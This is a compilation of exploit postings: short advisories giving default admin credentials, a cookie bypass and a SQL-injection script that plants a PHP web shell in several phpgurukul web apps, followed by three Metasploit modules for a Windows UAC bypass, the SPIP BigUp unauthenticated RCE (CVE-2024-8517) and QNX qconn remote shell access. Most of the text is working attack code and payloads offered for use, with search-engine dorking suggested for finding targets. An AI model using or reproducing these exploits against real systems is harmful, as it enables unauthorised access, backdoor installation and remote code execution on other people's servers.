<pre><code>====================================================================================================================================<br />| # Title : Emergency Ambulance Hiring Portal 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: admin<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/eahp/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Car Washing Management System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/car-washing-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: admin<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/agms/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Bus Pass Management System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: admin<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/buspassms/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : BP Monitoring Management System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/bp-monitoring-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: john@test.com<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/bpmms/edit-family-member.php?fmid=1<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Beauty Parlour & Saloon Management System 1.1 Insecure Cookie Handling Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The default username is admin & The chosen password is user123<br /><br />[+] use payload : document.cookie = "username=user123; path=/; secure; HttpOnly; SameSite=Lax";<br /><br />[+] Refresh the page http://127.0.0.1/studentms/admin/login.php or go to http://127.0.0.1/studentms/admin/dashboard.php <br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Auto/Taxi Stand Management System 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/auto-taxi-stand-management-system-using-php-and-mysql/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This payload inject php code contains a back door.<br /><br />[+] Line 16 + 19 Set your Target.<br /><br />[+] save payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php 1.php<br /><br />[+] payload :<br /><br /><?php<br />// المكتبات المطلوبة<br />function send_request($url, $data) {<br /> $options = [<br /> 'http' => [<br /> 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",<br /> 'method' => 'POST',<br /> 'content' => http_build_query($data),<br /> ]<br /> ];<br /> $context = stream_context_create($options);<br /> return file_get_contents($url, false, $context);<br />}<br /><br />// تحديد URL ثابت<br />$url = 'http://localhost/atsms/';<br /><br />// مسار ثابت لرفع الملف<br />$path = 'C:\www\atsms\uploaded.php';<br />$path = str_replace("\\", "\\\\", $path);<br /><br />// حمولة الباب الخلفي<br />$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';<br /><br />// إرسال ملف PHP يحتوي على الباب الخلفي<br />$payload = [<br /> 'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",<br /> 'password' => 'test',<br /> 'login' => ''<br />];<br />send_request($url . "/admin/index.php", $payload);<br /><br />echo "[+] PHP backdoor uploaded successfully at $path\n";<br /><br />// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي<br />$response = file_get_contents($url . "uploaded.php?cmd=whoami");<br />echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";<br />?><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Art Gallery Management System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: john@test.com<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/agms/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking<br /><br /> include Post::Windows::Priv<br /> include Post::Windows::Runas<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Windows Escalate UAC Execute RunAs',<br /> 'Description' => %q(<br /> This module will attempt to elevate execution level using<br /> the ShellExecute undocumented RunAs flag to bypass low<br /> UAC settings.<br /> ),<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'mubix', # Original technique<br /> 'b00stfr3ak' # Added powershell option<br /> ],<br /> 'Platform' => ['win'],<br /> 'SessionTypes' => ['meterpreter'],<br /> 'Targets' => [['Windows', {}]],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2012-01-03'<br /> ))<br /><br /> register_options([<br /> OptString.new('FILENAME', [false, 'File name on disk']),<br /> OptString.new('PATH', [false, 'Location on disk, %TEMP% used if not set']),<br /> OptEnum.new('TECHNIQUE', [true, 'Technique to use', 'EXE', %w(PSH EXE)]),<br /> ])<br /> end<br /><br /> def exploit<br /> if is_uac_enabled?<br /> print_status 'UAC is Enabled, checking level...'<br /> case get_uac_level<br /> when UAC_NO_PROMPT<br /> print_good 'UAC is not enabled, no prompt for the user'<br /> else<br /> print_status "The user will be prompted, wait for them to click 'Ok'"<br /> end<br /> else<br /> print_good 'UAC is not enabled, no prompt for the user'<br /> end<br /><br /> case datastore['TECHNIQUE']<br /> when 'EXE'<br /> shell_execute_exe(datastore['FILENAME'], datastore['PATH'])<br /> when 'PSH'<br /> shell_execute_psh<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Payload::Php<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HTTP::Spip<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'SPIP BigUp Plugin Unauthenticated RCE',<br /> 'Description' => %q{<br /> This module exploits a Remote Code Execution vulnerability in the BigUp plugin of SPIP.<br /> The vulnerability lies in the `lister_fichiers_par_champs` function, which is triggered<br /> when the `bigup_retrouver_fichiers` parameter is set to any value. By exploiting the improper<br /> handling of multipart form data in file uploads, an attacker can inject and execute<br /> arbitrary PHP code on the target server.<br /><br /> This critical vulnerability affects all versions of SPIP from 4.0 up to and including<br /> 4.3.1, 4.2.15, and 4.1.17. It allows unauthenticated users to execute arbitrary code<br /> remotely via the public interface. The vulnerability has been patched in versions<br /> 4.3.2, 4.2.16, and 4.1.18.<br /> },<br /> 'Author' => [<br /> 'Vozec', # Vulnerability Discovery<br /> 'Laluka', # Vulnerability Discovery<br /> 'Julien Voisin', # Code Review<br /> 'Valentin Lobstein' # Metasploit Module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2024-8517'],<br /> ['URL', 'https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_2_a_big_upload/'],<br /> ['URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-2-SPIP-4-2-16-SPIP-4-1-18.html']<br /> ],<br /> 'Platform' => %w[php unix linux win],<br /> 'Arch' => %w[ARCH_PHP ARCH_CMD],<br /> 'Targets' => [<br /> [<br /> 'PHP In-Memory', {<br /> 'Platform' => 'php',<br /> 'Arch' => ARCH_PHP<br /> # tested with php/meterpreter/reverse_tcp<br /> }<br /> ],<br /> [<br /> 'Unix/Linux Command Shell', {<br /> 'Platform' => %w[unix linux],<br /> 'Arch' => ARCH_CMD<br /> # tested with cmd/linux/http/x64/meterpreter/reverse_tcp<br /> }<br /> ],<br /> [<br /> 'Windows Command Shell', {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD<br /> # tested with cmd/windows/http/x64/meterpreter/reverse_tcp<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Privileged' => false,<br /> 'DisclosureDate' => '2024-09-06',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> OptString.new('FORM_PAGE', [true, 'A page with a form.', 'Auto'])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> rversion = spip_version || spip_plugin_version('spip')<br /> return Exploit::CheckCode::Unknown('Unable to determine the version of SPIP') unless rversion<br /><br /> print_status("SPIP Version detected: #{rversion}")<br /><br /> vulnerable_ranges = [<br /> { start: Rex::Version.new('4.0.0'), end: Rex::Version.new('4.1.17') },<br /> { start: Rex::Version.new('4.2.0'), end: Rex::Version.new('4.2.15') },<br /> { start: Rex::Version.new('4.3.0'), end: Rex::Version.new('4.3.1') }<br /> ]<br /><br /> is_vulnerable = vulnerable_ranges.any? { |range| rversion.between?(range[:start], range[:end]) }<br /><br /> unless is_vulnerable<br /> return CheckCode::Safe("The detected SPIP version (#{rversion}) is not vulnerable.")<br /> end<br /><br /> print_good("SPIP version #{rversion} is vulnerable.")<br /> plugin_version = spip_plugin_version('bigup')<br /><br /> unless plugin_version<br /> print_warning('Could not determine the version of the bigup plugin.')<br /> return CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")<br /> end<br /><br /> print_status("Bigup plugin version detected: #{plugin_version}")<br /> if plugin_version < Rex::Version.new('3.2.12')<br /> return CheckCode::Appears("Both the detected SPIP version (#{rversion}) and bigup version (#{plugin_version}) are vulnerable.")<br /> end<br /><br /> CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")<br /> end<br /><br /> # This function tests several pages to find a form with a valid CSRF token and its corresponding action.<br /> # It allows the user to specify a URL via the FORM_PAGE option (e.g., spip.php?article1).<br /> # We need to check multiple pages because the configuration of SPIP can vary.<br /> def get_form_data<br /> pages = %w[login spip_pass contact]<br /><br /> if datastore['FORM_PAGE']&.downcase != 'auto'<br /> pages = [datastore['FORM_PAGE']]<br /> end<br /><br /> pages.each do |page|<br /> url = normalize_uri(target_uri.path, page.start_with?('/') ? page : "spip.php?page=#{page}")<br /> res = send_request_cgi('method' => 'GET', 'uri' => url)<br /><br /> next unless res&.code == 200<br /><br /> doc = res.get_html_document<br /> action = doc.at_xpath("//input[@name='formulaire_action']/@value")&.text<br /> args = doc.at_xpath("//input[@name='formulaire_action_args']/@value")&.text<br /><br /> next unless action && args<br /><br /> print_status("Found formulaire_action: #{action}")<br /> print_status("Found formulaire_action_args: #{args[0..20]}...")<br /> return { action: action, args: args }<br /> end<br /><br /> nil<br /> end<br /><br /> # This function generates PHP code to execute a given payload on the target.<br /> # We use Rex::RandomIdentifier::Generator to create a random variable name to avoid conflicts.<br /> # The payload is encoded in base64 to prevent issues with special characters.<br /> # The generated PHP code includes the necessary preamble and system block to execute the payload.<br /> # This approach allows us to test multiple functions and not limit ourselves to potentially dangerous functions like 'system' which might be disabled.<br /> def php_exec_cmd(encoded_payload)<br /> vars = Rex::RandomIdentifier::Generator.new<br /> dis = "$#{vars[:dis]}"<br /> encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)<br /> <<-END_OF_PHP_CODE<br /> #{php_preamble(disabled_varname: dis)}<br /> $c = base64_decode("#{encoded_clean_payload}");<br /> #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}<br /> END_OF_PHP_CODE<br /> end<br /><br /> def exploit<br /> form_data = get_form_data<br /><br /> unless form_data<br /> fail_with(Failure::NotFound, 'Could not retrieve formulaire_action or formulaire_action_args value from any page.')<br /> end<br /><br /> print_status('Preparing to send exploit payload to the target...')<br /><br /> phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)<br /> b64_payload = framework.encoders.create('php/base64').encode(phped_payload).gsub(';', '')<br /><br /> post_data = Rex::MIME::Message.new<br /><br /> # This line is necessary for the form to be valid, works in tandem with formulaire_action_args<br /> post_data.add_part(form_data[:action], nil, nil, 'form-data; name="formulaire_action"')<br /><br /> # This value is necessary for $_FILES to be used and for the bigup plugin to be "activated" for this request, thus triggering the vulnerability<br /> post_data.add_part(Rex::Text.rand_text_alphanumeric(4, 8), nil, nil, 'form-data; name="bigup_retrouver_fichiers"')<br /><br /> # Injection is performed here. The die() function is used to avoid leaving traces in the logs,<br /> # prevent errors, and stop the execution of PHP after the injection.<br /> post_data.add_part('', nil, nil, "form-data; name=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}['.#{b64_payload}.die().']\"; filename=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}\"")<br /><br /> # This is necessary for the form to be accepted<br /> post_data.add_part(form_data[:args], nil, nil, 'form-data; name="formulaire_action_args"')<br /><br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'spip.php'),<br /> 'ctype' => "multipart/form-data; boundary=#{post_data.bound}",<br /> 'data' => post_data.to_s<br /> }, 1)<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::Tcp<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'QNX qconn Command Execution',<br /> 'Description' => %q{<br /> This module uses the qconn daemon on QNX systems to gain a shell.<br /><br /> The QNX qconn daemon does not require authentication and allows<br /> remote users to execute arbitrary operating system commands.<br /><br /> This module has been tested successfully on QNX Neutrino 6.5.0 (x86)<br /> and 6.5.0 SP1 (x86).<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'David Odell', # Discovery<br /> 'Mor!p3r', # PoC<br /> 'bcoles' # Metasploit<br /> ],<br /> 'References' => [<br /> ['EDB', '21520'],<br /> ['URL', 'https://www.optiv.com/blog/pentesting-qnx-neutrino-rtos'],<br /> ['URL', 'http://www.qnx.com/developers/docs/6.5.0SP1/neutrino/utilities/q/qconn.html'],<br /> ['URL', 'http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.neutrino_utilities/q/qconn.html']<br /> ],<br /> 'Payload' => {<br /> 'BadChars' => '',<br /> 'DisableNops' => true,<br /> 'Compat' => {<br /> 'PayloadType' => 'cmd_interact',<br /> 'ConnectionType' => 'find'<br /> }<br /> },<br /> 'DefaultOptions' => {<br /> 'WfsDelay' => 10,<br /> 'PAYLOAD' => 'cmd/unix/interact'<br /> },<br /> 'Platform' => 'unix', # QNX Neutrino<br /> 'Arch' => ARCH_CMD,<br /> 'Targets' => [['Automatic', {}]],<br /> 'Privileged' => false,<br /> 'DisclosureDate' => '2012-09-04',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => []<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> Opt::RPORT(8000),<br /> OptString.new('SHELL', [true, 'Path to system shell', '/bin/sh'])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> vprint_status('Sending check...')<br /><br /> connect<br /> res = sock.get_once(-1, 10)<br /><br /> return CheckCode::Unknown('Connection failed') unless res<br /><br /> return CheckCode::Safe unless res.include?('QCONN')<br /><br /> sock.put("service launcher\n")<br /> res = sock.get_once(-1, 10)<br /><br /> return CheckCode::Safe unless res.to_s.include?('OK')<br /><br /> fingerprint = Rex::Text.rand_text_alphanumeric(5..10)<br /> sock.put("start/flags run /bin/echo /bin/echo #{fingerprint}\n")<br /><br /> return CheckCode::Safe unless res.to_s.include?('OK')<br /><br /> Rex.sleep(1)<br /><br /> res = sock.get_once(-1, 10)<br /><br /> return CheckCode::Safe unless res.to_s.include?(fingerprint)<br /><br /> disconnect<br /><br /> CheckCode::Vulnerable<br /> end<br /><br /> def exploit<br /> connect<br /> res = sock.get_once(-1, 10)<br /><br /> fail_with(Failure::Unreachable, 'Connection failed') unless res<br /><br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply') unless res.include?('QCONN')<br /><br /> sock.put("service launcher\n")<br /> res = sock.get_once(-1, 10)<br /><br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply') unless res.to_s.include?('OK')<br /><br /> print_status('Sending payload...')<br /> sock.put("start/flags run #{datastore['SHELL']} -\n")<br /><br /> Rex.sleep(1)<br /><br /> fail_with(Failure::UnexpectedReply, 'Shell negotiation failed. Unexpected reply.') unless negotiate_shell(sock)<br /><br /> print_good('Payload sent successfully')<br /><br /> handler<br /> end<br /><br /> def negotiate_shell(sock)<br /> Timeout.timeout(15) do<br /> loop do<br /> data = sock.get_once(-1, 10)<br /><br /> return if data.blank?<br /><br /> if data.include?('#') || data.include?('No controlling tty')<br /> return true<br /> end<br /><br /> Rex.sleep(0.5)<br /> end<br /> end<br /> rescue ::Timeout::Error<br /> return nil<br /> end<br />end<br /></code></pre>